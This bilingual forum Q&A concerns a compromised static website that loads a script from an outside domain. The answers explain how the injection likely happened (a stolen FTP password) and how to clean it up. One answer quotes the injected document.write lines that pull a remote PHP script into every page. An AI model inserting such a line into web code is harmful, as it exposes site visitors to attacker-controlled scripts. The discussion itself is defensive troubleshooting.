我们的 html 网站中存在神秘的 URL

发布于 2024-08-07 22:41:11 字数 617 浏览 5 评论 0原文

我们的静态 html 网站 http://www.iffort.com 的主页正在从一个神秘的网站传输数据网站 rawalrohi.com。您可以访问 iffort.com 并注意那里的页脚来检查这一点。它说从 rawalrohi.com 传输数据。

从我们这边,我们做了以下事情来纠正这个问题

: a.) 分析所有页面的源代码。我们检查了代码,发现有一个脚本 src=http://rawalrohi.com/images/ART。 php 被插入到所有页面中。我们从网站的所有“html”页面中删除了这个脚本

b.)接下来我们与托管公司交谈,他们说他们可以为我们提供网站的备份。我们有备份,但尚未使用它来恢复站点。

c.)最后,我们更改了 FTP 密码,因为我们被告知有人可能破解了我们的 FTP 密码。

尽管如此,主页仍然显示从 rawalrohi.com 传输数据。查看源代码不会显示 URL。这会减慢我们网站的速度。

非常感谢任何帮助。

The home-page of our static html website http://www.iffort.com is transferring data from a mysterious website rawalrohi.com. You can check this by going to iffort.com and noticing the footer there. It says transferring data from rawalrohi.com.

From our side we did the following things to rectify the issue

a.) Analyze the source-code of all pages. We checked the code and found out that a script src=http://rawalrohi.com/images/ART.php was inserted in all pages. We removed this script from all the ‘html’ pages of the website

b.)Next we spoke to the hosting company, they said they can provide us a back up of the site. We have the backup but haven’t used it to restore the site.

c.)Lastly, we have changed the FTP password because we were told that somebody could have hacked our FTP password.

Despite doing this the home-page still says transferring data from rawalrohi.com. The view source doesn’t reveal the URL. This is slowing down our website.

Any help is greatly appreciated.

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(6

迷离° 2024-08-14 22:41:12

我没有扫描您的网站,但如果您在网站上使用任何标准软件,例如:WordPress、Drupal、Joomla 等,那么您需要始终保持更新。订阅他们的安全警报,每当您看到更新时,放下您正在做的一切并进行更新。

黑客不断扫描互联网以查找易受攻击的网站。他们只需要几分之一秒的时间就能感染易受攻击的网站。

此外,还要保持所有插件、附加组件、组件、模块、贡献等的更新。

否则,您将一遍又一遍地清洁它。

I didn't scan your site, but if you're using any standard software on your website, like: WordPress, Drupal, Joomla, etc. then you need to keep that updated at all times. Subscribe to their security alerts and whenever you see an update, drop everything you're doing and update.

Hackers are constantly scanning the internet for vulnerable websites. It only takes them a fraction of a second on a vulnerable site to infect it.

Also, keep all the plugins, add-ons, components, modules, contributions, etc. updated as well.

Otherwise, you'll be cleaning this over and over again.

听你说爱我 2024-08-14 22:41:11

您的页面引用了一个名为“js/hyperlinked_Images.js”的文件
看看这个文件,就在底部附近:

...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');

现在请原谅,我要在我的系统上运行快速 AV 扫描;)

Your page references a file called "js/hyperlinked_Images.js"
Have a look at this file, right near the bottom:

...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');

Now if you'll excuse me, I'm go to run a quick AV scan on my system ;)

淤浪 2024-08-14 22:41:11

确保您不要使用一个 FTP 帐户来做所有事情,控制 FTP 用户控制,它将帮助您管理您的网站。

make sure you don't use one FTP account for everything, control the FTP user control, it will help you to manage your website.

月竹挽风 2024-08-14 22:41:11

我不久前也见过类似的行为。在该特定情况下,ftp 密码已被泄露:收集存储的 ftp 密码的恶意软件从客户端桌面 PC 读取该密码。

几天之内密码被更改并再次被泄露后,我们才发现这一点。

因此,请确保使用合适的 AV 扫描仪扫描所有“知道”ftp 密码的计算机。

I've seen similar behaviour a while back. In that specific case, the ftp-password was compromised: it was read from the clients desktop PC by malware that collected stored ftp passwords.

We found this out only after the password was changed and compromised again within a few days.

So make sure you scan all machines that 'know' the ftp password with a decent AV-scanner.

葵雨 2024-08-14 22:41:11

我最近刚刚在客户网站上看到了这一点,他们的所有文件中都有不同的网址但相同类型的代码注入。为了解决这个问题,我下载了该站点,并使用 Visual Studio 对字符串进行了站点范围的“查找和替换”。这为我解决了问题。我建议您对所有文件执行类似的操作,您可能会错过一个。我的客户网站有 html/htm/aspx 文件,这些文件都被感染了,ISP 也做出了同样的声明,FTP 密码可能已被泄露......

I just recently saw this on a clients website, a different url but same type of code injection was in all of their files. To fix the problem, I download the site and I used Visual Studio to do a sitewide "find & replace" on the string. This solved the problem for me. I suggest you do something similar for all files, you might have missed one. My clients site had html/htm/aspx files that were all infected, ISP made the same statement that the FTP password was probably compromised...

小兔几 2024-08-14 22:41:11

确保您安装了防病毒软件。每当您的网站加载有趣的外部脚本(如广告软件、间谍软件)时,您的防病毒软件就会提醒您。

Make sure you on your antivirus. Whenever the your website loading funny external script like adware, spyware, your antivirus will alert you.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文